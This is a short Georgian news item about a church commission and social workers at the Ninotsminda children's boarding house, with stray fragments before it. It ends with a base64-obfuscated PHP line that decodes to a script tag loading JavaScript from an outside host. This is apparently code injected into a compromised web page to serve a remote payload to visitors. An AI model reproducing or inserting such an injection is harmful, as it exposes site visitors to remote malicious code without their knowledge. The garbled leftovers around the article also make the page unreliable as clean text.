celsiusi
ავერსი შნაიდერი
ახალქალაქის, კუმურდოსა და კარის ეპარქიის მიტროპოლიტი ნიკოლოზი, რომელიც საპატრიარქოში შექმნილი კომისიის თავმჯდომარეა არ გამორიცხავს, რომ ნინოწმინდის ბავშვთა პანსიონატის საკითხზე მსჯელობა იყოს სინოდის სხდომაზეც. 
 
ამის შესახებ მეუფე ნიკოლოზმა ნინოწმინდის პანსიონში დღევანდელი შეხვედრის დასრულების შემდეგ განაცხადა.
 
"ამ წუთას შევთანხმდით იმაზე, რომ სოცმუშაკები დარჩებიან, ჩვენ ახლა გავემგზავრებით და გვექნება კომუნიკაცია ერთმანეთთან. სოცმუშაკების დიდი ნაწილი დღის განმავლობაში იმუშავებს, შედარებით მცირე ნაწილი დარჩება ღამე; კიდევ შევთანხმდით იმაზე, რომ ეს მუშაობა გაგრძელდება რამდენი ხანიც საჭირო იქნება,"- განაცხადა მიტროპოლიტმა ნიკოლოზმა.
 
1249
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");